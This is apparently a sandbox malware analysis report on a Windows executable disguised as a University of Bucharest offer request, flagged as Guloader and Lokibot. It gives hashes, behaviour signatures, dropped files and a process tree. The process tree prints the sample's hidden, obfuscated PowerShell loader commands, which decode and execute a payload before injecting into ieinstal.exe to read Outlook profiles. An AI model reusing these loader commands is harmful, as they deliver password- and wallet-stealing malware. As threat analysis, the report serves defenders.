Analysis

  • max time kernel
    143s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    23/05/2023, 10:56

General

  • Target

    SolicitaioofertUniversitateaBucureti.exe

  • Size

    506KB

  • MD5

    a641f04f9c7d8b2612c716ec9a55b857

  • SHA1

    ed0abba02647cc9863d02393f32cdba22fe5325a

  • SHA256

    e7b589089c914473bfaf3bcfd4dfb4b4084b314389d7f89d2f50447736f4e959

  • SHA512

    f4c245d10812717ced823cdfeb53954e8a5aa69881ba534912ad20de57a8f9265f2453fae81a6d8e7a34117613c489e08a506f04634be0bb428fcea5f13d8d95

  • SSDEEP

    12288:o3w0eNbZ5daCBdeX7S6ceZX7xfHdOKgCtw4Yo2Jx9a:o3w0MZZXeX7S6dZG3CFGxw

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SolicitaioofertUniversitateaBucureti.exe
    "C:\Users\Admin\AppData\Local\Temp\SolicitaioofertUniversitateaBucureti.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:324
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\Admin\AppData\Local\Temp\Heterokaryotic\Dybene.Deb' ; powershell.exe ''$cas''
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Philotheism Stownlins Kvindeemancipations #>$Resocialiseringsinstitutionerne = """…""";Function Forfatningsrettigheds9 { param([String]$Termokandes); For($Rger=2; $Rger -lt $Termokandes.Length-1; $Rger+=(2+1)){ $Trkister = $Trkister + $Termokandes.Substring($Rger, 1); } $Trkister;}$Agennesis0 = Forfatningsrettigheds9 'WeIGlE BXbu ';&$Agennesis0 (Forfatningsrettigheds9 $Resocialiseringsinstitutionerne);<#Svingene Andelsgaardenes Heracleopolite Limers #>;"
        3⤵
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1072
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
          4⤵
          • Checks QEMU agent file
          • Accesses Microsoft Outlook profiles
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:320

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Heterokaryotic\Dybene.Deb

    Filesize

    19KB

    MD5

    0d80876312ed78dcafe26b3925edc042

    SHA1

    2b37657fa8a8ff22b41f0e602f1945030f512e92

    SHA256

    41a2d5d8f60b4e355901a5c704e3f71f45e684bdbcef556433e911a82f025c79

    SHA512

    0fa4688cafcdea2f95b81010cffef8e34721b083e018596662f4f2af776bd59ecf16d1a20a37adcd3c1f8770ae2d215782f00162ef904987dc36bcffcb8947e8

  • C:\Users\Admin\AppData\Local\Temp\Heterokaryotic\Kategoriseringernes.sph

    Filesize

    270KB

    MD5

    795fc3047fc71e348408d6b89097d390

    SHA1

    23bf7d838a50fdd00792dd5e193bed670aab7c95

    SHA256

    7e37a3c7cd7821504b13d4a332f587125dfe16785b4b058de651ee48cd0b8a41

    SHA512

    4bd6965898c7497aea63a263b25c35d79cabe6a3531a1cc495833d66b5c7d73c1007390b66af91197477c75e30d693ca67993aebd8f76d0b8c748bf176e405f6

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UG87AYWQHOPSQ74QUHZH.temp

    Filesize

    7KB

    MD5

    71c38832f660b3ae36b4ca1134a26387

    SHA1

    b67291ee051e3edd4b6b34c749581735caf1f078

    SHA256

    cfb213c16ff969dbf96baae40df3ed68bb9efb0208eae6a7c6bd6f614cf8e76c

    SHA512

    0695dffdbb9c513417f5c9beac234c0dac57ec6ab2697f8ff56e2dc69c27bb65e32225434725d814dc640a7bb016965bf4a53f0a9b40c3c0e20d18af0182e77c

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    71c38832f660b3ae36b4ca1134a26387

    SHA1

    b67291ee051e3edd4b6b34c749581735caf1f078

    SHA256

    cfb213c16ff969dbf96baae40df3ed68bb9efb0208eae6a7c6bd6f614cf8e76c

    SHA512

    0695dffdbb9c513417f5c9beac234c0dac57ec6ab2697f8ff56e2dc69c27bb65e32225434725d814dc640a7bb016965bf4a53f0a9b40c3c0e20d18af0182e77c

  • memory/320-68-0x00000000010D0000-0x000000000392C000-memory.dmp

    Filesize

    40.4MB

  • memory/320-69-0x00000000010D0000-0x000000000392C000-memory.dmp

    Filesize

    40.4MB

  • memory/320-70-0x0000000000400000-0x0000000000615000-memory.dmp

    Filesize

    2.1MB

  • memory/320-94-0x00000000010D0000-0x000000000392C000-memory.dmp

    Filesize

    40.4MB

  • memory/320-95-0x00000000010D0000-0x000000000392C000-memory.dmp

    Filesize

    40.4MB

  • memory/320-97-0x00000000010D0000-0x000000000392C000-memory.dmp

    Filesize

    40.4MB

  • memory/2020-59-0x00000000025B0000-0x00000000025F0000-memory.dmp

    Filesize

    256KB

  • memory/2020-60-0x00000000025B0000-0x00000000025F0000-memory.dmp

    Filesize

    256KB